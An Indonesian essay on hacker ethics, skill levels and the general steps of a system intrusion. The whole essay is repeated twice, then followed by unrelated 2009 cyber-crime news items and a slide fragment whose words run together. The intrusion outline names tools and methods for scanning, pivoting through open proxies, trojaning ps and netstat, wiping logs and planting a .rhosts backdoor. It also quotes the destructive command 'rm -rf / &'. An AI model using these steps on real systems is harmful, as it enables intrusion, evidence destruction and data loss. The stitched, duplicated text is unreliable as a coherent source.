Yang menarik, ternyata dalam dunia hacker terjadi strata / tingkatan / level yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya, bukan karena umur atau senioritasnya. Proses yang paling berat adalah untuk memperoleh pengakuan / derajat / acknowledgement diantara masyarakat underground, seorang hacker harus mampu membuat program untuk meng-eksploit kelemahan sistem, menulis tutorial (artikel) biasanya dalam format ASCII text biasa, aktif diskusi di mailing list / IRC channel para hacker, membuat situs web dsb. Entah kenapa warna background situs web para hacker seringkali berwarna hitam gelap, mungkin untuk memberikan kesan misterius. Proses
memperoleh acknowledgement / pengakuan, akan memakan waktu lama bulanan bahkan tahun, tergantung ke piawaian hacker tersebut.
Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika & aturan main dunia underground. Etika ini yang akhirnya akan membedakan antara hacker & cracker, maupun hacker kelas rendahan seperti Lamer & Script Kiddies. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy 1984, ada enam (6) etika yang perlu di resapi seorang hacker:
1. Akses ke komputer – dan apapun yang akan mengajarkan kepada anda bagaimana dunia ini berjalan / bekerja – harus dilakukan tanpa batas & totalitas. Selalu mengutamakan pengalaman lapangan!
2. Semua informasi harus bebas, terbuka, transparan, tidak di sembunyikan.
3. Tidak pernah percaya pada otoritas, penguasa – percaya pada desentralisasi.
4. Seorang hacker hanya di nilai dari kemampuan hackingnya, bukan kriteria buatan seperti gelar, umur, posisi atau suku bangsa.
5. Seorang hacker membuat seni & keindahan di komputer.
6. Komputer dapat mengubah hidup anda menuju yang lebih baik.
Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html, yaitu:
• Di atas segalanya, hormati pengetahuan & kebebasan informasi.
• Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
• Jangan mengambil keuntungan yang tidak fair dari hack.
• Tidak mendistribusikan & mengumpulkan software bajakan.
• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.
• Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
• Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
• Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.
Jelas dari Etika & Aturan main Hacker di atas, sangat tidak mungkin seorang hacker betulan akan membuat kerusakan di komputer.
Tentunya ada berbagai tingkatan / strata di dunia underground. Saya yakin tidak semua orang setuju dengan derajat yang akan dijelaskan disini, karena ada kesan arogan terutama pada level yang tinggi. Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’. Sedangkan, di ujung lain derajat hacker dikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’. Yang pasti para pencuri kartu kredit bukanlah seorang hacker tingkat tinggi, mereka hanyalah termasuk kategori hacker kelas paling rendah / kacangan yang sering kali di sebut sebagai Lamer. Mereka adalah orang tanpa pengalaman & pengetahuan biasanya ingin menjadi hacker (wanna-be hacker). Lamer biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer Lamer terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS (Denial of Service). Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya Lamer hanya akan sampai level developed kiddie atau script kiddie saja.
Developed Kiddie, dua tingkat di atas Lamer – di sebut Kiddie karena kelompok ini masih muda (ABG) & masih sekolah (SMU atau sederajat). Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
Script Kiddie, seperti tingkat di atasnya, yaitu developed kiddie, biasanya melakukan aktifitas hacking berbasis pada Grafical User Interface (GUI). Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
Dua tingkat tertinggi para hacker & yang membuat legenda di underground dunia maya, adalah tingkat Elite & Semi Elite. Barangkali kalau di terjemahkan ke bahasa Indonesia, tingkat ini merupakan suhu dunia underground. Elite juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.
Semi Elite - hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.
Sombong merupakan salah satu sebab utama seorang hacker tertangkap. Mereka menyombongkan diri & memproklamirkan apa yang mereka capai untuk memperoleh pengakuan dari yang lain. Hacker lain, karena pengetahuan-nya masih kurang, biasanya akan memilih target secara hati-hati, tanpa terlihat, diam-diam seperti siluman di kegelapan malam. Setelah melalui banyak semedi & membaca banyak buku-buku tentang kerja jaringan komputer, Request For Comment (RFC) di Internet & mempraktekan socket programming. Semua ini tidak pernah di ajarkan di bangku sekolah maupun kuliah manapun. Secara perlahan mereka akan naik hirarki mereka sesuai dengan kemampuannya, tanpa menyombongkan dirinya – itulah para suhu dunia underground. Salah satu suhu hacker di Indonesia yang saya hormati & kagumi kebetulan bekas murid saya sendiri di Teknik Elektro ITB, beliau relatif masih muda + sekarang telah menjadi seorang penting di Research & Development Telkomsel.
Umumnya pembuatan software akan sangat berterima kasih akan masukan dari para hacker, karena dengan adanya masukan ini software yang mereka buat menjadi semakin baik. Memang kadang eksploit yang dihasilkan para hacker tidak langsung di peroleh si perusahaan software, tapi di tahan oleh komunitas underground ini – sampai digunakan oleh lamers & membuat kekacauan.
Bagaimana proses hacking dilakukan? Ah ini bagian paling menarik dalam dunia underground. Ada bermacam-macam teknik hacking, yang paling menyebalkan adalah jika terjadi Denial of Service (DoS) yang menyebabkan server / komputer yang kita gunakan menjadi macet / mati. Terlepas dari masalah menyebalkan, secara umum ada empat (4) langkah sederhana yang biasanya dilakukan, yaitu:
1. Membuka akses ke situs.
2. Hacking root (superuser)
3. Menghilangkan jejak.
4. Membuat backdoor (jalan belakang), untuk masuk di kemudian hari.
Hmmm bagaimana secara singkat lebih jauh proses hacking ini dilakukan? Untuk dapat mengakses ke dalam sebuah situs biasanya melalui beberapa proses terlebih dulu, seperti hal-nya dinas intelejen, kita harus tahu persis segala sesuatu tentang perusahaan & situs yang akan kita masuki, rencana melarikan diri kalau ada apa-apa dsb. Proses intelejen ini dilakukan dalam tiga (3) tahapan besar, yaitu footprinting, scanning & enumeration. Footprinting untuk mengetahui seberapa besar scope / wilayah serangan bisa dilihat dari berbagai file HTML perusahaan tsb, perintah whois, host, dig, nslookup pada Linux untuk melihat scope host yang perlu di serang / di amankan. Scanning untuk melihat servis apa saja yang ada di mesin-mesin tersebut, topologi jaringan dsb. bisa dilakukan mengunakan perintah ping, traceroute, nmap, strobe, udp_scan, netcat di Linux & terakhir Cheops untuk melakukan network mapping. Enumeration sistem operasi yang jalan di server target apakah Windows NT/2000 / Linux / Netware. Program seperti snmputil, enum, dumpsec, showmount, rcpinfo, finger menjadi sangat “handy”.
Setelah proses intelejen di lakukan dengan baik proses serangan dapat mulai dikerjakan. Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Detail sepuluh (10) besar serangan di Internet bisa dibaca di http://www.sans.org/topten.html. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar hacker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate / proxy server; dapat melalui unauthenticated SOCKproxy port 1080 atau open Web proxy port 80, 81, 8000, 8080. Daftar WinGate server di maintain oleh CyberArmy di http://www.cyberarmy.com/wingate/.
Langkah selanjutnya, hacker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya hacker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Hacker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi hacker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah hacker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka hacker akan menjalan program untuk menaklukan program daemon yang lemah di server. Cara paling sederhana menggunakan script kiddies yang tersedia di Internet di http://www.technotronics.com / http://www.hackingexposed.com seperti cgiscan.c, phfscan.c dsb. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan
program daemon ini akan memungkinkan seorang Hacker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang hacker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Program seperti zap, wzap, wted, remove akan membantu. Walaupun simpel text editor seperti vi dapat juga melakukan pekerjaan itu. Jangan lupa menambahkan program 'backdooring' dengan cara Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh. Selanjutnya seorang hacker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, tapi seorang hacker yang baik akan memberitahukan sistem administrator tentang kelemahan sistemnya & tidak akan pernah menjalankan perintah ‘rm –rf / &’.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.
Cukup banyak situs di Internet yang bisa menjadi basis pengetahuan underground, beberapa diantara-nya berbahasa Indonesia seperti Kecoa Elektronik http://www.k-elektronik.org, Hackerlink http://www.hackerlink.or.id, maupun Anti-hackerlink (entah dimana lokasinya). Referensi terbaik mungkin bisa dibaca di berbagai situs di luar negeri seperti http://packetstorm.securify.com, http://www.hackingexposed.com, http://neworder.box.sk, http://www.sans.org, http://www.rootshell.com.
Masyarakat Underground? Bawah tanah? … Betul, masyarakat yang tidak terlihat, tidak terdeteksi, seperti siluman, mereka hidup & berjaya di dunia maya – tanpa terdeteksi oleh pengguna Internet biasa, tak terdeteksi oleh sistem administrator WARNET & ISP.Siapakah mereka? – mereka adalah para hacker. Media & stereotype masyarakat membentuk karakter hacker sebagai orang jahat dan suka merusak. Stereotype ABG 15-20 tahun-an, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan men-delete, berbelanja menggunakan kartu kredit curian atau menghancurkan apa saja yang bisa mereka hancurkan – “anak” ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi. Hacker yang betul sebenarnya tidak seperti yang ada dalam stereotype banyak orang di atas.
Di dunia elektronik underground nama jelas & nama lengkap tidak digunakan. Orang biasanya menggunakan nama alias, callsign atau nama samaran. Hal ini memungkinkan kita bisa menyamarkan identitas, dan hanya di kenali sesama underground. Beberapa nama diantara hacker Indonesia bisa dikenali seperti hC, cbug, litherr, fwerd, d_ajax, r3dshadow, cwarrior, ladybug, chiko, gelo, BigDaddy dsb..
Apakah perbedaan mendasar antara seorang cracker & hacker? Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”
Berbeda dengan Cracker, Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatan-nya. Ada beberapa karakteristik yang menandakan seseorang adalah hacker, seperti (1) dia suka belajar detail dari bahasa pemrograman atau system, (2) dia melakukan pemrograman tidak cuma berteori saja, (3) dia bisa menghargai, menikmati hasil hacking orang lain, (4) dia dapat secara cepat belajar pemrogramman, dan (5) dia ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.
Yang menarik, ternyata dalam dunia hacker terjadi strata / tingkatan / level yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya, bukan karena umur atau senioritasnya. Proses yang paling berat adalah untuk memperoleh pengakuan / derajat / acknowledgement diantara masyarakat underground, seorang hacker harus mampu membuat program untuk meng-eksploit kelemahan sistem, menulis tutorial (artikel) biasanya dalam format ASCII text biasa, aktif diskusi di mailing list / IRC channel para hacker, membuat situs web dsb. Entah kenapa warna background situs web para hacker seringkali berwarna hitam gelap, mungkin untuk memberikan kesan misterius. Proses
memperoleh acknowledgement / pengakuan, akan memakan waktu lama bulanan bahkan tahun, tergantung ke piawaian hacker tersebut.
Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika & aturan main dunia underground. Etika ini yang akhirnya akan membedakan antara hacker & cracker, maupun hacker kelas rendahan seperti Lamer & Script Kiddies. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy 1984, ada enam (6) etika yang perlu di resapi seorang hacker:
1. Akses ke komputer – dan apapun yang akan mengajarkan kepada anda bagaimana dunia ini berjalan / bekerja – harus dilakukan tanpa batas & totalitas. Selalu mengutamakan pengalaman lapangan!
2. Semua informasi harus bebas, terbuka, transparan, tidak di sembunyikan.
3. Tidak pernah percaya pada otoritas, penguasa – percaya pada desentralisasi.
4. Seorang hacker hanya di nilai dari kemampuan hackingnya, bukan kriteria buatan seperti gelar, umur, posisi atau suku bangsa.
5. Seorang hacker membuat seni & keindahan di komputer.
6. Komputer dapat mengubah hidup anda menuju yang lebih baik.
Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html, yaitu:
• Di atas segalanya, hormati pengetahuan & kebebasan informasi.
• Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
• Jangan mengambil keuntungan yang tidak fair dari hack.
• Tidak mendistribusikan & mengumpulkan software bajakan.
• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.
• Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
• Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
• Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.
Jelas dari Etika & Aturan main Hacker di atas, sangat tidak mungkin seorang hacker betulan akan membuat kerusakan di komputer.
Tentunya ada berbagai tingkatan / strata di dunia underground. Saya yakin tidak semua orang setuju dengan derajat yang akan dijelaskan disini, karena ada kesan arogan terutama pada level yang tinggi. Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’. Sedangkan, di ujung lain derajat hacker dikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’. Yang pasti para pencuri kartu kredit bukanlah seorang hacker tingkat tinggi, mereka hanyalah termasuk kategori hacker kelas paling rendah / kacangan yang sering kali di sebut sebagai Lamer. Mereka adalah orang tanpa pengalaman & pengetahuan biasanya ingin menjadi hacker (wanna-be hacker). Lamer biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer Lamer terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS (Denial of Service). Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya Lamer hanya akan sampai level developed kiddie atau script kiddie saja.
Developed Kiddie, dua tingkat di atas Lamer – di sebut Kiddie karena kelompok ini masih muda (ABG) & masih sekolah (SMU atau sederajat). Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
Script Kiddie, seperti tingkat di atasnya, yaitu developed kiddie, biasanya melakukan aktifitas hacking berbasis pada Grafical User Interface (GUI). Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
Dua tingkat tertinggi para hacker & yang membuat legenda di underground dunia maya, adalah tingkat Elite & Semi Elite. Barangkali kalau di terjemahkan ke bahasa Indonesia, tingkat ini merupakan suhu dunia underground. Elite juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.
Semi Elite - hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.
Sombong merupakan salah satu sebab utama seorang hacker tertangkap. Mereka menyombongkan diri & memproklamirkan apa yang mereka capai untuk memperoleh pengakuan dari yang lain. Hacker lain, karena pengetahuan-nya masih kurang, biasanya akan memilih target secara hati-hati, tanpa terlihat, diam-diam seperti siluman di kegelapan malam. Setelah melalui banyak semedi & membaca banyak buku-buku tentang kerja jaringan komputer, Request For Comment (RFC) di Internet & mempraktekan socket programming. Semua ini tidak pernah di ajarkan di bangku sekolah maupun kuliah manapun. Secara perlahan mereka akan naik hirarki mereka sesuai dengan kemampuannya, tanpa menyombongkan dirinya – itulah para suhu dunia underground. Salah satu suhu hacker di Indonesia yang saya hormati & kagumi kebetulan bekas murid saya sendiri di Teknik Elektro ITB, beliau relatif masih muda + sekarang telah menjadi seorang penting di Research & Development Telkomsel.
Umumnya pembuatan software akan sangat berterima kasih akan masukan dari para hacker, karena dengan adanya masukan ini software yang mereka buat menjadi semakin baik. Memang kadang eksploit yang dihasilkan para hacker tidak langsung di peroleh si perusahaan software, tapi di tahan oleh komunitas underground ini – sampai digunakan oleh lamers & membuat kekacauan.
Bagaimana proses hacking dilakukan? Ah ini bagian paling menarik dalam dunia underground. Ada bermacam-macam teknik hacking, yang paling menyebalkan adalah jika terjadi Denial of Service (DoS) yang menyebabkan server / komputer yang kita gunakan menjadi macet / mati. Terlepas dari masalah menyebalkan, secara umum ada empat (4) langkah sederhana yang biasanya dilakukan, yaitu:
1. Membuka akses ke situs.
2. Hacking root (superuser)
3. Menghilangkan jejak.
4. Membuat backdoor (jalan belakang), untuk masuk di kemudian hari.
Hmmm bagaimana secara singkat lebih jauh proses hacking ini dilakukan? Untuk dapat mengakses ke dalam sebuah situs biasanya melalui beberapa proses terlebih dulu, seperti hal-nya dinas intelejen, kita harus tahu persis segala sesuatu tentang perusahaan & situs yang akan kita masuki, rencana melarikan diri kalau ada apa-apa dsb. Proses intelejen ini dilakukan dalam tiga (3) tahapan besar, yaitu footprinting, scanning & enumeration. Footprinting untuk mengetahui seberapa besar scope / wilayah serangan bisa dilihat dari berbagai file HTML perusahaan tsb, perintah whois, host, dig, nslookup pada Linux untuk melihat scope host yang perlu di serang / di amankan. Scanning untuk melihat servis apa saja yang ada di mesin-mesin tersebut, topologi jaringan dsb. bisa dilakukan mengunakan perintah ping, traceroute, nmap, strobe, udp_scan, netcat di Linux & terakhir Cheops untuk melakukan network mapping. Enumeration sistem operasi yang jalan di server target apakah Windows NT/2000 / Linux / Netware. Program seperti snmputil, enum, dumpsec, showmount, rcpinfo, finger menjadi sangat “handy”.
Setelah proses intelejen di lakukan dengan baik proses serangan dapat mulai dikerjakan. Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Detail sepuluh (10) besar serangan di Internet bisa dibaca di http://www.sans.org/topten.html. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar hacker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate / proxy server; dapat melalui unauthenticated SOCKproxy port 1080 atau open Web proxy port 80, 81, 8000, 8080. Daftar WinGate server di maintain oleh CyberArmy di http://www.cyberarmy.com/wingate/.
Langkah selanjutnya, hacker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya hacker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Hacker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi hacker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah hacker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka hacker akan menjalan program untuk menaklukan program daemon yang lemah di server. Cara paling sederhana menggunakan script kiddies yang tersedia di Internet di http://www.technotronics.com / http://www.hackingexposed.com seperti cgiscan.c, phfscan.c dsb. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan
program daemon ini akan memungkinkan seorang Hacker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang hacker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Program seperti zap, wzap, wted, remove akan membantu. Walaupun simpel text editor seperti vi dapat juga melakukan pekerjaan itu. Jangan lupa menambahkan program 'backdooring' dengan cara Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh. Selanjutnya seorang hacker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, tapi seorang hacker yang baik akan memberitahukan sistem administrator tentang kelemahan sistemnya & tidak akan pernah menjalankan perintah ‘rm –rf / &’.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.
Cukup banyak situs di Internet yang bisa menjadi basis pengetahuan underground, beberapa diantara-nya berbahasa Indonesia seperti Kecoa Elektronik http://www.k-elektronik.org, Hackerlink http://www.hackerlink.or.id, maupun Anti-hackerlink (entah dimana lokasinya). Referensi terbaik mungkin bisa dibaca di berbagai situs di luar negeri seperti http://packetstorm.securify.com, http://www.hackingexposed.com, http://neworder.box.sk, http://www.sans.org, http://www.rootshell.com.
Contoh Kasus Cyber Crime di Indonesia dan di Dunia Tahun 2009
1 HANOI - Kejahatan internet yang semakin merajalela, ternyata terus membuat pengguna komputer mengalami kerugian materi yang tidak sedikit.Di Vietnam, cyber crime berhasil membuat kerugian mencapai USD1,76 miliar atau sekira Rp1,8 triliun.
Namun ironisnya, banyak perusahaan di Vietnam tidak mempunyai sistem keamanan yang mumpuni. Selain itu, kurangnya perlindungan terhadap penjahat cyber menyebabkan hampir 60 juta komputer yang terinfeksi virus dan 461 situs diserang oleh hacker.
Seperti yang dilansir Vietnam News Agency, Kamis (26/3/2009), tahun lalu dari 40 kasus kejahatan dunia maya. Telah menyebabkan negara Uncle Ho itu mengalami kerugian sedikitnya USD1,76 miliar. Dan tentu saja, ini membuat Vietnam ketar-ketir.
Ini semakin diperparah dengan minimnya sistem pengamanan di berbagai perusahaan. Dari data yang dikeluarkan, tujuh puluh persen perusahaan belum memiliki perjanjian resmi tentang sistem keamanan internet. Bahkan delapan puluh persen, tidak mengetahui informasi tentang sistem informasi keamanan yang jelas.
Untuk itulah, demi melindungi asetnya, Vietnam tengah menggeber penggunaan sistem keamanan yang memadai bagi perusahaan. Terlebih, pertumbuhan internet di sana sangat menunjang pertumbuhan ekonomi mereka
2 SINGAPURA - Penggunaan media internet oleh para teroris di Asia Tenggara menunjukan peningkatan yang signifikan, kelompok yang sering dituding oleh dunia barat sebagai ekstrimis itu menggunakan ranah maya untuk menyebarkan ide radikal, merekut serta melatih para anggotanya.
Temuan yang dilakukan oleh Sekolah Internasional S Rajaratnam Singapura dan Institut Strategi Kepolisian Australian memberitahu kalau, banyak pihak keamanan di Asia Tenggara yang sukses bisa mendeteksi keberadaan sebuah bom, tapi mereka tidak mengerti bagaimana bom itu dibuat."Indikasi yang menunjukan kalau peningkatan ini terjadi salah satunya adalah, makin banyaknya kelompok ekstrimis mengunggah video melalui internet mengenai cara membuat dan menggunakan bom," terang juru bicara
Sekolah Rajaratman, seperti yang dilansir AFP, Senin (20/4/2009).
Menurut data yang mereka himpun, hingga 2008 lalu sudah ada 117 situs tentang kelompok radikal ini. Padahal, pada 2007 sebelumnya, situs seperti ini hanya berjumlah tidak kurang dari 15 saja. Dan kebanyakan dari situs tersebut, berbasis di Indonesia dan Filipiina "Kita harus memperhatikan dengans serius pertumbuhan dan pergerakan kelompok radikal online tersebut," tadas juru bicara tersebut
3 Jaringan Internet KPU Diserang Oleh 'Cybercrime'
Jaringan internet di Pusat Tabulasi Nasional Komisi Pemilihan Umum sempat down (terganggu) beberapa kali. Untuk menangani kasus kriminal di dunia maya yang biasa disebut cybercrime, Komisi Pemilihan Umum sudah menggandeng kepolisian. "Cybercrime polisi juga sudah membantu. Domain kerjasamanya antara KPU dengan kepolisian," kata Ketua Tim Teknologi Informasi KPU, Husni Fahmi,di Kantor KPU, Jalan Imam Bonjol, Menteng, Jakarta Pusat, Rabu, 15 April 2009.
BeberapaBentukAncamanJaringan
•Phreaking
Perilakumenjadikansistempengamananteleponmelemah
•Hacker
–Orangyang secaradiam-diammempelajarisistem yang iasanyasukardimengertiuntuk kemudian mengelolanyadanmen-share hasilujicoba yang dilakukannya.
–Hacker tidakmerusaksistem
•Craker
–Orangyang secaradiam-diammempelajarisistem denganmaksudjahat
–Munculkarenasifatdasarmanusiayang selaluingin membangun(salahsatunyamerusak)
•Cracker
–Ciri-ciricracker :
•Bisamembuatprogram C, C++ ataupearl
•MemilikipengetahuanTCP/IP
•Menggunakaninternet lebihdari50 jam per-
bulan
